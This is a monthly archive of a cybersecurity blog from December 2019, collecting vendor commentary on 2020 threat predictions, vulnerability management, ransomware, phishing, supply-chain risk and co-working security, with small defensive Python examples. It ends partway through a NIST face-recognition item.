Monthly Archives: December 2019

Cyber Attacks are the Norm

By Babur Nawaz Khan, Product Marketing, A10 Networks

As we bid farewell to 2019, it is time to look ahead to 2020 and what it has in store for enterprises.

Since we are in the business of securing our enterprise customers’ infrastructures, we keep a close eye on how the security and encryption landscape is changing so we can help our customers to stay one step ahead.

In 2019, ransomware made a comeback, worldwide mobile operators made aggressive strides in the transformation to 5G, and GDPR completed its first full year of enforcement, with the industry seeing some of the largest fines ever imposed for massive data breaches experienced by enterprises.

2020 will no doubt bring a mix of the familiar, like the continued rash of DDoS attacks on government entities and cloud and gaming services, and the new and emerging. Below are just a few of the trends we see coming next year.

Ransomware will increase globally through 2020
Ransomware attacks are proliferating because they can now be launched even against smaller players. Even a small amount of data can be used to hold an entire organisation, city or even country to ransom. The trend of attacks levied against North American cities and city governments will only continue to grow.

We will see new strains of ransomware introduced:

  • Modular or multi-leveled/layered ransomware and malware attacks will become the norm as this evasion technique becomes more prevalent. Modular attacks use multiple trojans and viruses to start the attack before the actual malware or ransomware is eventually downloaded and launched.
  • 70% of all malware attacks will use encryption to evade security measures (encrypted malware attacks)
Unsurprisingly, the cyber security skills gap will keep on widening. As a result, security teams will struggle to create fool-proof policies and to leverage the full potential of their security investments.

Slow Adoption of new Encryption Standards
Although TLS 1.3 was ratified by the Internet Engineering Task Force in August 2018, we won't see widespread or mainstream adoption: less than 10% of websites worldwide will start using TLS 1.3. TLS 1.2 will remain relevant, and therefore the leading TLS version in use globally, since it has not been compromised yet, it supports PFS (perfect forward secrecy), and the industry is generally slow to adopt new standards. Conversely, elliptic-curve cryptography (ECC) ciphers will see more than 80% adoption as older ciphers, such as RSA, disappear.
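As an illustrative aside, you can check which TLS version a given server actually negotiates with a few lines of Python's standard `ssl` module. This is a minimal sketch, not a compliance scanner; whether TLS 1.3 is offered also depends on the OpenSSL build behind your local Python.

```python
import socket
import ssl

def is_modern_tls(version: str) -> bool:
    """TLS 1.2 and 1.3 are the versions still considered safe to offer."""
    return version in ("TLSv1.2", "TLSv1.3")

def negotiated_tls_version(host: str, port: int = 443, timeout: float = 5.0) -> str:
    """Connect to a server and report the TLS version it negotiates."""
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            return tls.version()  # e.g. "TLSv1.3" or "TLSv1.2"
```

Running `negotiated_tls_version("example.com")` against a range of sites gives a quick, informal picture of how far TLS 1.3 adoption has actually come.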

Decryption: It’s not a Choice Any Longer
TLS decryption will become mainstream as more attacks leverage encryption for infection and data breaches. Since decryption remains a compute-intensive process, firewall performance degradation will remain higher than 50%, and most enterprises will continue to overpay for SSL decryption due to a lack of skills within their security teams. To mitigate firewall performance challenges and the lack of skilled staff, enterprises will have to adopt dedicated decryption solutions as a more efficient option, even as next-generation firewalls (NGFWs) continue to polish their on-board decryption capabilities.

Cyber attacks are indeed the new normal. Each year brings new security threats, data breaches and operational challenges, meaning that businesses, governments and consumers have to always be on their toes. 2020 won't be any different, particularly with the transformation to 5G mobile networks and the dramatic rise in IoT adoption by both consumers and businesses, which expand the potential for massive and widespread cyber threats exponentially.

Let’s hope that organisations, as well as security vendors, focus on better understanding the security needs of the industry, and invest in solutions and policies that would give them a better chance at defending against the ever-evolving cyber threat landscape.

Only Focused on Patching? You’re Not Doing Vulnerability Management

By Anthony Perridge, VP International, ThreatQuotient

When I speak to security professionals about vulnerability management, I find that there is still a lot of confusion in the market. Most people immediately think I’m referring to getting rid of the vulnerabilities in the hardware and software within their network, but vulnerability management encompasses a much broader scope.

Vulnerability management is not just vulnerability scanning, the technical task of scanning the network to get a full inventory of all software and hardware and precise versions and current vulnerabilities associated with each. Nor is it vulnerability assessment, a project with a defined start and end that includes vulnerability scanning and a report on vulnerabilities identified and recommendations for remediation. Vulnerability management is a holistic approach to vulnerabilities – an ongoing process to better manage your organisation’s vulnerabilities for the long run. This practice includes vulnerability assessment which, by definition, includes vulnerability scanning, but also other steps as described in the SANS white paper, Implementing a Vulnerability Management Process.

Just as the process of vulnerability management is broader than you might think, the definition of a vulnerability is as well. A vulnerability is the state of being exposed to the possibility of an attack. The technical vulnerabilities in your network are one component, but there is another important aspect that is often overlooked – the vulnerabilities specific to your company, industry and geography. You can’t only look internally at the state of your assets. You must also look externally at threat actors and the campaigns they are currently launching to get a more complete picture of your vulnerabilities and strengthen your security posture more effectively.

In The Art of War, Sun Tzu captured the value of this strategy well when he stated, “If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer defeat. If you know neither the enemy nor yourself, you will succumb in every battle.”

Prioritise Patching Based on the Threat
As stated above, with respect to vulnerability management, most security organisations tend to focus on patching, but because they don't have the resources to patch everything quickly, they need to figure out what to patch first. To do this, security teams typically take a rule-of-thumb approach: they start with critical assets, the servers where their crown jewels are located, and work down to less critical assets. While a good starting point, their prioritisation decisions are based only on internal information. As Sun Tzu points out, knowing yourself but not the enemy will yield some victories but also defeats.

Having a platform that serves as a central repository allows you to aggregate internal threat and event data with external threat feeds and normalise that data so that it is in a usable format. By augmenting and enriching information from inside your environment with external threat intelligence about indicators, adversaries and their methods, you can map current attacks targeting your company, industry and geography to vulnerabilities in your assets. Intelligence about a campaign that presents an immediate and actual threat to your organisation leads to a more accurate assessment of priorities and may cause you to change your current patch plan to prioritise those systems that could be attacked at that moment. The result is intelligence-driven patch management that hardens your processes to thwart the attack.
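The normalise-then-correlate step described above can be sketched in a few lines. This is a hypothetical simplification (real platforms handle many indicator types, confidence scores and ageing); the defanged `[.]` convention and the sample indicators are illustrative assumptions, not data from any specific feed.

```python
def normalise(indicator: str) -> str:
    """Normalise an indicator to a comparable form: trim, lowercase,
    and undo the common defanging convention example[.]com."""
    return indicator.strip().lower().replace("[.]", ".")

def prioritise(internal_events, external_feed):
    """Return indicators seen both inside the environment and in external
    threat intelligence -- candidates for immediate patch/response priority."""
    seen_internally = {normalise(i) for i in internal_events}
    return sorted(normalise(i) for i in external_feed
                  if normalise(i) in seen_internally)

hits = prioritise(
    ["EVIL.example[.]com", "10.0.0.5"],          # from internal logs
    ["evil.example.com", "bad.example.net"],      # from an external feed
)
# hits == ["evil.example.com"]
```

The overlap set is exactly the "immediate and actual threat" signal that justifies reshuffling a patch plan.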


Bridge the Visibility Gap
Unfortunately, the reality is that not every company has 100% visibility into their assets and vulnerabilities, so mapping external threat data to internal indicators to hone a patch plan sometimes has limited value. However, there is still tremendous value in gathering information from global threat feeds and other external intelligence sources to determine if your business is under a specific attack. The MITRE ATT&CK framework is one such source. It dives deep into adversaries and their methodologies so security analysts can use that information to their advantage.

Bringing MITRE ATT&CK data into your repository allows you to start from a higher vantage point with information on adversaries and associated tactics, techniques and procedures. You can take a proactive approach, beginning with your organisation’s risk profile, mapping those risks to specific adversaries and their tactics, drilling down to techniques those adversaries are using and then investigating if these techniques could be successful or if related data have been identified in the environment. For example, you may be concerned with APT28 and can quickly answer questions including: What techniques do they apply? Have I seen potential indicators of compromise or possible related system events in my organisation? Are my endpoint technologies detecting those techniques? With answers to questions like these you can discover real threats, determine specific actions to harden your network and processes, and mitigate risk to your business.

A holistic approach to vulnerability management, that includes knowing yourself and your enemy, allows you to go beyond patching. It provides awareness and intelligence to effectively and efficiently mitigate your organisation’s risk and position your team to address other high-value activities – like detecting, containing and remediating actual attacks, and even anticipating potential threats.

Lessons Learned: A Decade of Digital Parenting


Give yourself a high-five, parents. Pour yourself a cup of coffee or your favorite celebratory drink and sip it slow — real slow. Savor the wins. Let go of the misses. Appreciate the lessons learned. You’ve come a long way in the last decade of raising digital kids, and not all of it has been easy.

As we head into 2020, we’re tossing parenting resolutions (hey, it’s a victory to make it through a week let alone a year!). Instead, we’re looking back over the digital terrain we’ve traveled together and lessons learned. Need a refresher? Here’s a glimpse of how technology has impacted the family over the past decade.

In the last decade

• Smartphone, social and gaming growth. Social media and gaming platforms have exploded to usage and influence levels no one could have imagined. Smartphone ownership has increased, and as of 2019: 81% of adults own a smartphone and 72% use social media, 53% of kids own a smartphone by the age of 11, and 84% of teenagers have phones.

• Video platform growth. Video platforms like YouTube have become the go-to for teens and tweens who spend nearly three hours a day watching videos online.

• Streaming news. Smartphones have made it possible for all of us to carry (and stream) the world in our pockets. In 2018, for the first time, social media sites surpassed print newspapers as a news source for Americans.

• Dating apps dominate. We’re hooking up, dating, and marrying using apps. A Stanford study found that “heterosexual couples are more likely to meet a romantic partner online than through personal contacts and connections.”

• The rise of the Influencer. Internet influencers and celebrities have reached epic levels of fame, wealth, and reach, creating an entire industry of vloggers, gamers, micro and niche-influencers, and others who have become “instafamous.”

• Lexicon changes. Every day, technology is adding terms to our lexicon that didn’t exist a decade ago such as selfie, OMG, streaming, bae, fake news, the cloud, wearables, finsta, influencers, emojis, tracking apps, catfish, digital shaming, screen time, cryptojacking, FOMO, and hashtag, along with hundreds of others.

What we’ve learned (often the hard way)

Most people, if polled, would say technology has improved daily life in incalculable ways. But ask a parent of a child between five and 18 the same question, and the response may not be as enthusiastic. Here are some lessons we’ve learned the hard way.

Connection brings risk. We’ve learned that with unprecedented connection comes equally unprecedented risk. Everyday devices plug our kids directly into the potential for cyberbullying, sexting, inappropriate content, and mental health issues.  Over the past decade, parents, schools, and leaders have worked to address these risks head-on but we have a long way to go in changing the online space into an emotionally safe and healthy place.

Tech addiction isn’t a myth.  To curb the negative impact of increased tech use, we’ve learned ways to balance and limit screen time, unplug, and digitally detox. Most importantly, it’s been confirmed that technology addiction is a medical condition that’s impacting people and families in very painful ways.

The internet remembers. We’ve witnessed the very public consequences of bad digital choices. Kids and adults have wrecked scholarships, reputations, and careers due to careless words or content shared online. Because of these cases, we’re learning — though never fast enough — to think twice about the behaviors and words we share.

We’re equipping vs. protecting. We’ve gone from monitoring our kids aggressively and freaking out over headlines to realizing that we can’t put the internet in a bottle and follow our kids 24/7. We’ve learned that relevant, consistent conversation, adding an extra layer of protection with security software, and taking the time to understand (not just monitor) the ways our kids use new apps, is the best way to equip them for digital life.

The parent-child relationship is #1. When it comes to raising savvy digital kids and keeping them safe, there’s not a monitoring plan in existence that rivals a strong parent-child relationship. If you’ve earned your child’s heart, mind, and respect, you have his or her attention and can equip them daily to make wise choices online.

The dark web is . . . unimaginably dark. The underbelly of the internet — the encrypted, anonymous terrain known as the Dark Web — has moved from covert to mainstream exposure. We’ve learned the hard way the degree of sophistication with which criminals engage in pornography, human trafficking, drug and weapon sales, and stolen data. With more knowledge, the public is taking more precautions especially when it comes to malware, phishing scams, and virus attacks launched through popular public channels.

There’s a lot of good going on. As much negative as we’ve seen and experienced online over the past decade, we’ve also learned that its power can be used equally to amplify the best of humanity. Social media has sparked social movements, helped first responders and brought strangers together in times of tragedy like no other medium in history.

Privacy is (finally) king. Ten years ago, we clicked on every link that came our way and wanted to share every juicy detail about our personal lives. We became publishers and public figures overnight and readily gave away priceless chunks of our privacy. The evolution and onslaught of data breaches, data mining, and malicious scams have educated us to safeguard our data and privacy like gold.

We’ve become content curators. The onslaught of fake news, photo apps, and filter bubbles have left our heads spinning and our allegiances confused. In the process, we’ve learned to be more discerning with the content we consume and share. While we’re not there yet, our collective digital literacy is improving as our understanding of various types of content grows.

Parents have become digital ninjas. The parenting tasks of monitoring, tracking, and keeping up with kids online have gone from daunting to doable for most parents. With the emotional issues now connected to social media, most parents don’t have the option of sitting on the sidelines and have learned to track their kids better than the FBI.

This is us

We’ve learned that for better or worse, this wired life is us. There’s no going back. Where once there may have been doubt a decade ago, today it’s clear we’re connected forever. The internet has become so deep-seated in our culture and homes that unplugging completely for most of us is no longer an option without severe financial (and emotional) consequences. The task ahead for this new decade? To continue working together to diminish the ugly side of technology — the bullying, the cruelty, the crime — and make the internet a safe, fun experience for everyone.

The post Lessons Learned: A Decade of Digital Parenting appeared first on McAfee Blogs.

Cybersecurity And Privacy for a Co-Working Space

The way we work and the spaces we work in have evolved considerably in the last fifty years. Corporate culture is nothing like what it used to be back in the '80s and '90s. Cabins and cubicles have given way to open offices. Many in the workforce today prefer to work remotely and maintain flexible hours. As such, hot-desking is common in many multi-national companies, including those with large office spaces. As the start-up culture evolved, there was a need for multiple small offices. This growing breed of self-employed professionals and start-up owners needs other resources commonly required in the office environment, like printers, shredders, Wi-Fi, meeting rooms and video-conferencing facilities. They also need a common place to meet people, network and exchange ideas, because working solo can be monotonous at times. Co-working provides an all-in-one solution for the needs of such individuals and small groups by offering a common space where equipment and utilities can be shared between the businesses that rent it. Co-working spaces have thus become very popular across the world, especially in cities where real estate is very expensive. According to statistics, the number of co-working spaces increased by 205% between 2014 and 2018.

In any business, however, security is paramount. Corporate espionage is very much a reality for small businesses, which are very often the breeding ground for great ideas and innovations. Co-working spaces provide a melting pot of unrelated people, some of whom cannot really be trusted. Thus it is necessary that, when sharing space, equipment and utilities, users do not unknowingly end up sharing information and trade secrets. Ensuring data privacy and cyber security in a shared office can be very difficult, but it may be achieved by laying down ground rules and ensuring that everyone follows them. Following are some security best practices for a co-working space.

  1. Ensuring network security: While shared Wi-Fi access is probably one of the most popular and heavily utilised services provided by a co-working space, it is also the most vulnerable from a cyber security perspective. The following practices help ensure secure Wi-Fi access for all users.
    1. Having a dedicated administrator who ensures that networks are set up correctly and securely. This person can also liaise with users to ensure that they follow the guidelines.
    2. Setting up strong passwords for every network and ensuring that all passwords are changed frequently. This also prevents former members from accessing the network.
    3. Setting up individual networks and access pages for every business using the space, including a separate network for guests.

  2. Securing smart devices: IoT has brought intelligence to everyday devices like TVs, refrigerators, coffee machines and printers. A co-working space may be home to many such devices connected to the network. Tampering with any of these devices can allow people to access the Wi-Fi network, or vice versa. It is therefore necessary to secure these devices by ensuring that their hardware is tamper-proof and their firmware is continuously updated. All devices that can connect to the network, including laptops and phones, should be password protected and should not be left around unlocked and/or unattended.

  3. Blocking websites: It is best to block potentially malicious websites that are not likely to do anyone any good. Corporate offices have always taken this step to prevent unwanted traffic and ensure network and data security. There is no reason why co-working spaces cannot offer this as a service.

  4. Vetting users: Co-working spaces may run a minimum background check on users to ensure that they fit in with the business culture of the space and will not disrupt the normal functioning of other users in any way.

  5. Physical monitoring: Physical monitoring using cameras can ensure that users do not try to steal any data or equipment that does not belong to them. Providing physical access cards, logging users in and out, and installing cameras all contribute to the overall security of the space.
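The "strong passwords, changed frequently" guidance in point 1 is easy to operationalise. As a minimal sketch (the alphabet and length are illustrative choices), a shared-space administrator could generate rotation passwords with Python's `secrets` module, which draws from a cryptographically secure random source:

```python
import secrets
import string

# Illustrative character set; adjust to whatever your access points accept.
ALPHABET = string.ascii_letters + string.digits + "-_!#%@"

def generate_network_password(length: int = 20) -> str:
    """Generate a strong random Wi-Fi password using a CSPRNG.
    Never use random.choice for credentials -- it is predictable."""
    if length < 12:
        raise ValueError("refusing to generate a short, weak password")
    return "".join(secrets.choice(ALPHABET) for _ in range(length))
```

A scheduled job could call this monthly per network and push the result to each tenant's access page.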

While these guidelines are general, they should be useful to both co-working space operators and users, giving them an idea of what to look out for and how to secure their private data and intellectual property.


The post Cybersecurity And Privacy for a Co-Working Space appeared first on CyberDB.

ACSC aware of critical vulnerability in Citrix Application Delivery Controller and Citrix Gateway

The Australian Signals Directorate’s Australian Cyber Security Centre (ACSC) is aware of a critical vulnerability that exists in the Citrix Application Delivery Controller (ADC) (formerly known as NetScaler ADC) and Citrix Gateway (formerly known as NetScaler Gateway). The vulnerability, known as CVE-2019-19781, was initially disclosed on 17 December 2019 and could allow an unauthenticated attacker to perform arbitrary code execution on an organisation’s local network.

12 days of Christmas Security Predictions: What lies ahead in 2020

Marked by a shortage of cyber security talent and attackers willing to exploit any vulnerability to achieve their aims, this year emphasised the need for organisations to invest in security and understand their risk posture. With the number of vendors in the cyber security market rapidly growing, standards for managing identities and access rising, and organisations investing more in security tools, 2020 will be a transformational year for the sector.

According to Rob Norris, VP Head of Enterprise & Cyber Security EMEIA at Fujitsu: “We anticipate that 2020 will be a positive year for security, and encourage the public and private sectors to work together to bring more talent to the sector and raise industry standards. As the threat landscape continues to expand, with phishing and ransomware still popular, so will the security tools, leaving organisations with a variety of solutions. Next year will also be marked by a rush to create an Artificial Intelligence silver bullet for cyber security and a move from old-fashioned password management practices to password-less technologies.”

“As cyber criminals continue to find new ways to strike, we’ll be working hard to help our customers across the world to prepare their people, processes and technology to deal with these threats. One thing to always keep in mind is that technology alone cannot stop a breach - this requires a cultural shift to educate employees across organisations about data and security governance. After all, people are always at the front line of a cyber-attack.”

What will 2020 bring with Cybersecurity?

In light of this, Rob Norris shares his “12 Days of Christmas” security predictions for the coming year.

1. A United front for Cyber Security Talent Development
The shortage of cyber security talent will only get worse in 2020 - if we allow it to.

The scarce talent pool of cyber security specialists has become a real problem, with various reports estimating a global shortage of 3.5 million unfilled positions by 2021. New approaches to talent creation need to be considered.

The government, academia, law enforcement and businesses all have a part to play in talent identification and development and will need to work collaboratively to provide different pathways for students who may not ordinarily be suited to the traditional education route. Institutions offering new cyber security courses for technically gifted individuals are a great starting point, but more will need to be done in 2020 if the shortage is to be reduced.

2. Cloud Adoption Expands the Unknown Threat Landscape 
It will take time for organisations to understand their risk posture as the adoption of cloud services grows.

While the transition to cloud-based services will provide many operational, business and commercial benefits, many CISOs will be working to understand the risks to their business from new data flows, data storage and new services. The boundaries and control of services in traditional networks are typically very well understood, while the velocity and momentum of cloud adoption leaves CISOs with unanswered questions. Valid concerns remain around container security, cloud storage, cloud sharing applications, identity theft and vulnerabilities yet to be understood or exposed.

3. The Brexit Effect 
Brexit will have far-reaching cyber security implications for many organisations, in many countries.

The UK and European markets are suffering from uncertainty around the UK’s departure from the European Union, which will affect the adoption of cyber security services, as organisations will be reticent to spend until the impact of Brexit is fully understood.

The implications of data residency legislation, hosting, corporation tax, EU-UK security collaboration and information sharing are all questions that will need to be answered in 2020, post-Brexit. There is a long-standing collaborative relationship between the UK and its EU counterparts, including European CERTs and Europol, and whilst the dynamics of those working relationships should continue, CISOs and senior security personnel will be watching closely to observe the real impact.

4. SOAR Revolution 
Security Orchestration, Automation and Response (SOAR) is a real game-changer for cyber security and early adopters will see the benefits in 2020 as the threat landscape continues to expand.

Threat intelligence is a domain that has taken a while for organisations to understand in terms of terminology and real business benefits. SOAR is another domain that will take time to be understood and adopted, but the business benefits are also tangible. At a granular level, the correct adoption of SOAR will help organisations map, understand and improve their business processes. By making correct use of their technology stack and associated APIs, early adopters will get faster and enhanced reporting and will improve their security posture through the reduction of the Mean Time To Respond (MTTR) to threats that could impact their reputation, operations and bottom line.
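MTTR itself is a simple metric: the average gap between when an incident is detected and when it is responded to. A minimal sketch (the incident timestamps are made up for illustration):

```python
from datetime import datetime, timedelta

def mean_time_to_respond(incidents):
    """MTTR: the average gap between detection and response, over a
    list of (detected_at, responded_at) pairs."""
    gaps = [responded - detected for detected, responded in incidents]
    return sum(gaps, timedelta()) / len(gaps)

# Hypothetical incident log: (detected_at, responded_at)
incidents = [
    (datetime(2020, 1, 6, 9, 0), datetime(2020, 1, 6, 10, 30)),   # 90 min
    (datetime(2020, 1, 7, 14, 0), datetime(2020, 1, 7, 14, 30)),  # 30 min
]
# mean_time_to_respond(incidents) == timedelta(hours=1)
```

The point of SOAR is to shrink those gaps automatically; tracking the number before and after adoption is how early adopters will demonstrate the benefit.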

5. Further Market Fragmentation will Frustrate CISOs 
The number of vendors in the cyber security market has been rapidly growing and that will continue in 2020, but this is leading to confusion for organisations.

The cyber security market is increasingly saturated, often to the frustration of CISOs, who are frequently asked to evaluate new products. Providers that can offer a combined set of cyber security services delivering clear business outcomes will gain traction, as they offer benefits over disparate security technologies: a reduction in contract management, discounts provisioned across services, a single point of contact, and fewer services and technologies to manage.

Providers that continue to acquire security technologies to enhance their stack such as Endpoint Detection and Response (EDR) or technology analytics, will be best positioned to provide the full Managed Detection and Response (MDR) services that organisations need.

6. Artificial Intelligence (AI) will need Real Security 
2020 will see a rise in the use of adversarial attacks to exploit vulnerabilities in AI systems.

There is a rush to create an AI silver-bullet for cyber security however, there is currently a lack of focus on security for AI. It is likely we will see a shift towards this research area as “adversarial” approaches to neural networks could potentially divulge partial or complete data points that the model was trained on. It is also possible to extract parts of a model leading to intellectual property theft as well as the ability to craft “adversarial” AI which can manipulate the intended model. Currently, it is hard to detect and remediate these attacks.

There will need to be more focus on explainable AI, which would allow for response and remediation on what are currently black-box models.

7. Organisations will need to Understand how to make better use of Security Tools and Controls at their Disposal 
Customers will need to take better advantage of the security measures that they already have available. 

The well-established cloud platforms already contain many integrated security features but organisations are failing to take advantage of these features, partly because they do not know about them. A greater understanding of these features will allow organisations to make smarter investment decisions and we expect to see a growing demand for advice and services that allow organisations to optimally configure and monitor those technologies to ensure they have minimal risk and exposure to threats.

Fujitsu predicted last year that securing multi-cloud environments will be key going forward and organisations continue to need to find a balance of native and third-party tools to drive the right solution for their objectives.

8. Do you WannaCry again? 
The end of support for Windows Server 2008 and Windows 7 will open the door for well-prepared attackers.

January 2020 sees the official end of support life for all variants of Windows Server 2008 and Windows 7, which share elements of the same code base. This means that both end-user devices and data center servers will be equally vulnerable to the same exploits and opens the possibility that organisations could be susceptible to attacks that cause large outages.

In 2017, WannaCry surfaced and caused some well-publicised outages at well-known organisations across the healthcare, manufacturing, logistics and aerospace industries. Microsoft had released patches two months before and recommended using a later version of the impacted components. 2017 also showed, via the Shadow Brokers leak, that nation-states had built up an armoury of previously undisclosed exploits. These exploits are documented to target the majority of publicly available operating systems, so it stands to reason that cyber criminals could also have built a war chest of tools which will surface once vendor support has ended for these operating systems.

9. Raising the Standard for Managing Identities and Access
Federated Authentication, Single Sign-On and Adaptive Multi-Factor will become standard, if not required, practices in 2020.

2020 will see organisations continuing their adoption of hybrid and multi-cloud infrastructures and a ‘cloud-first’ attitude for applications. This creates the challenge of managing the expanding bundle of associated identities and credentials across the organisation.

Identities and associated credentials are the key attack vector in a data breach - they are the ‘keys to the kingdom’. Without sufficient controls, especially for those with privileged rights, it is becoming increasingly difficult for organisations to securely manage identities and mitigate the risk of a data breach. Capabilities such as Federated Authentication, Single Sign-On and Adaptive Multi-Factor address the challenge of balancing security and usability, and we see these becoming standard, if not required, practice in 2020.

10. Extortion Phishing on the Rise 
Phishing and social engineering techniques enhanced with taboo lures will prey on user privacy.

We are seeing an increase in a form of phishing that would have a recipient believe their potentially embarrassing web browsing and private activity has been observed with spyware and will be made public unless a large ransom is paid.

Since their widespread emergence last year, the techniques used by these extortionists to evade filters continue to develop. Simple text-only emails from single addresses now come from ‘burnable’ single-use domains. Glyphs from the Cyrillic, Greek, Armenian and extended Latin alphabets are being used to substitute letters in the email to bypass keyword filters and Bitcoin wallets are rotated often and used to associate a recipient with a payment.
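The glyph-substitution trick described above can often be caught by checking whether a single word mixes Unicode scripts. A minimal sketch in Python, using only the standard library (the detection rule is illustrative, not a production filter):

```python
import unicodedata

def script_of(ch):
    """Approximate a character's script from the first word of its Unicode
    name, e.g. "CYRILLIC SMALL LETTER A" -> "CYRILLIC"."""
    return unicodedata.name(ch, "UNKNOWN").split(" ")[0]

def is_suspicious(word):
    """Flag words that mix Latin letters with look-alike glyphs from other
    alphabets, a common keyword-filter evasion trick."""
    scripts = {script_of(ch) for ch in word if ch.isalpha()}
    return len(scripts) > 1 and "LATIN" in scripts

print(is_suspicious("p\u0430yment"))  # Cyrillic 'а' hidden in a Latin word -> True
print(is_suspicious("payment"))       # pure Latin -> False
```

A real filter would normalize confusable characters (per Unicode TR39) before keyword matching rather than just flagging mixed-script words.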

The psychological tricks used in the wording of these emails will develop and likely aid their continued success.

11. Passwords become a Thing of the Past 
We will see increasing adoption of end-to-end password-less access, especially in scenarios where Privileged Access Management (PAM) is required.

Next year we will see a move from old-fashioned password management practices to password-less technologies. The increasing number of cases where privileged credentials and passwords are required, but are painful to manage in a secure and cost-effective way, will drive this shift. Passwords are easy to forget, and the increasing complexity requirements placed upon users increase the chances of passwords having to be written down - which is self-defeating. Biometric technologies and ephemeral certificates will provide a more secure and user-friendly way to manage credentials and ensure assets and data are kept secure.

12. Ransomware not so Random
As more organisations employ negotiators to work with threat actors, ransom demands are likely to decrease next year.

In 2019, we observed a shift in the way certain ransomware ransom notes were constructed. Traditionally, ransomware notes are generic template text informing the victim that their files are encrypted and that they must pay a set amount of Bitcoin in order to have their files decrypted.

When threat actors successfully deploy ransomware network-wide and achieve other deployment objectives, they inform their victims their files are encrypted. Crucially, however, they do not reveal the price they demand for their decryption. Instead, threat actors seek to open a dialogue with the victim to discuss a price. This change has seen organisations employ negotiators to work with threat actors on managing and, hopefully, reducing the demand and we expect this to continue in 2020.

How the Cyber Grinch Stole Christmas: Managing Retailer Supply Chain Cyber Risk

Cyber threats are always a prominent risk to businesses, especially those operating with high quantities of customer information in the retail space: over 50% of global retailers were breached in the last year. BitSight VP Jake Olcott has written guidance for retailers on how to manage their supply-chain cyber risk in four simple steps, to help keep the 'Cyber Grinch' at bay not just at Christmas but throughout the year.


Cyber risk in retail is not a new concept. Retail is one of the most targeted industries when it comes to cyber-attacks. In fact, over 50% of global retailers were breached in the last year. Given the sensitive customer data these organizations often possess, like credit card information and personally identifiable information (PII), it's not surprising that attackers have been capitalizing on the industry for decades.

The Christmas shopping season can increase retailers’ cyber risk, with bad actors looking to take advantage of the massive surge of in-store and online shoppers that comes with it. What is important for retailers to keep in mind is that it’s not only their own network they have to worry about when it comes to mitigating cyber risk, but their entire supply chain ecosystem – from shipping distributors and production partners to point-of-sale technologies and beyond.

Take for example the infamous 2017 NotPetya attack, which initially targeted organizations in Ukraine but ended up stalling operations for many retailers as a result. This nation-state attack had a snowball effect, wreaking havoc on shipping companies like FedEx and Maersk who are responsible for delivering many retail orders. FedEx operations were reduced to manual processes for pick-up, sort and delivery, and Maersk saw infections in part of its corporate network that paralyzed some systems in its container business and prevented retail customers from booking ships and receiving quotes.

For retailers, a cyber disruption in the supply chain can fundamentally disrupt operations, causing catastrophic harm to brand reputation and financial performance and bringing regulatory repercussions - and the stakes are even higher during the make-or-break holiday sales period.

Here are some important steps they can take now to mitigate supply chain cyber risk this holiday season and beyond.
 
Step 1: Inventory your Supply Chain
A business today relies on an average of 89 vendors a week that have access to their network in order to perform various crucial business functions. As outsourcing and cloud adoption continue to rise across retail organizations, it is critical that they keep an up-to-date catalogue of every third party and service provider in the digital (or brick-and-mortar) supply chain and their network access points. These supply chain ecosystems can be massive, but previous examples have taught us that security issues impacting any individual organization can potentially disrupt the broader system.

An inventory of vendors and the systems they have access to allows security teams to keep track of all possible paths a cybercriminal may exploit and can help them better identify vulnerabilities and improve response time in the event of an incident.
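As a sketch of what such an inventory might look like in practice, the snippet below models vendors with the systems they can reach and flags stale access reviews. The vendor names and the 90-day review window are hypothetical:

```python
from dataclasses import dataclass
from datetime import date

@dataclass
class Vendor:
    name: str
    service: str
    network_access_points: list   # systems or segments the vendor can reach
    last_reviewed: date           # date of the last access review

def overdue_reviews(inventory, today, max_age_days=90):
    """Flag vendors whose network access has not been reviewed recently."""
    return [v.name for v in inventory
            if (today - v.last_reviewed).days > max_age_days]

# Hypothetical supply-chain entries
inventory = [
    Vendor("AcmeShipping", "logistics", ["edi-gateway"], date(2019, 6, 1)),
    Vendor("POSCo", "point-of-sale", ["store-vlan"], date(2019, 11, 20)),
]
print(overdue_reviews(inventory, date(2019, 12, 15)))  # ['AcmeShipping']
```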

Step 2: Take control of your Third-Party Accounts
Once you have a firm grasp of the supply chain, a critical focus should be to identify and manage any network accounts held by these organizations. While some suppliers may need access to complete their daily tasks, this shouldn’t mean handing them a full set of keys to the kingdom on their terms.

Retailers should ensure each vendor has an email account and credentials affiliated and managed by the retailer – not by the supplier organization and certainly not the user themselves. By taking this step, the retailer can ensure they are the first point of notification if and when an incident occurs and are in full control over the remediation process.


Step 3: Assess your Suppliers’ Security Posture
Retail security teams often conduct regular internal audits to evaluate their own security posture but fail to do so effectively when it comes to their supply chain relationships.

While a supplier’s security posture doesn’t necessarily indicate that their products and services contain security flaws, in the cyber world, where there’s smoke, there’s eventually fire. Poor security performance can be indicative of bad habits that could lead to increased vulnerability and risk exposure.

Having clear visibility into supplier security performance can help retailers quickly pinpoint security vulnerabilities and cyber incidents, while significantly speeding up communication and action to address the security concern at hand.

Step 4: Continuously Monitor for Changes
Third-party security performance assessment should not be treated as a one-and-done item on the supply chain management checklist.

The cyber threat landscape is volatile and ever-evolving, with new vulnerabilities and attack vectors cropping up virtually every day. That means retailers need solutions and strategies in place that provide a real-time, continuous and measurable pulse check of supplier security posture to ensure they are on top of potential threats before they impact the business and its customers.

Just as retailers track billions of packages and shipments in real-time to ensure there are no mistakes or bumps in the road, their vendor risk management program should be treated with the same due care.

This holiday season and beyond, it is critical that retailers invest in supply chain security management to reduce the risk of data breaches, slowdowns, and outages - and the costs and reputational damage that come along with them. After all, retailers are only as secure as their weakest third party.

NIST Study Evaluates Effects of Race, Age, Sex on Face Recognition Software

How accurately do face recognition software tools identify people of varied sex, age and racial background? According to a new study by the National Institute of Standards and Technology (NIST), the answer depends on the algorithm at the heart of the system, the application that uses it and the data it’s fed — but the majority of face recognition algorithms exhibit demographic differentials. A differential means that an algorithm’s ability to match two images of the same person varies from one demographic group to another. Results captured in the report, Face Recognition Vendor Test (FRVT)
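To illustrate what a demographic differential means in practice, the sketch below computes the true-match rate per group from genuine (same-person) comparison trials and takes the spread between groups. The data is invented for illustration and does not reflect FRVT results:

```python
from collections import defaultdict

def match_rate_by_group(trials):
    """trials: (group, matched) outcomes for genuine same-person image pairs.
    Returns the true-match rate per demographic group."""
    counts = defaultdict(lambda: [0, 0])   # group -> [matches, total]
    for group, matched in trials:
        counts[group][0] += int(matched)
        counts[group][1] += 1
    return {g: m / n for g, (m, n) in counts.items()}

# Invented outcomes for two hypothetical groups
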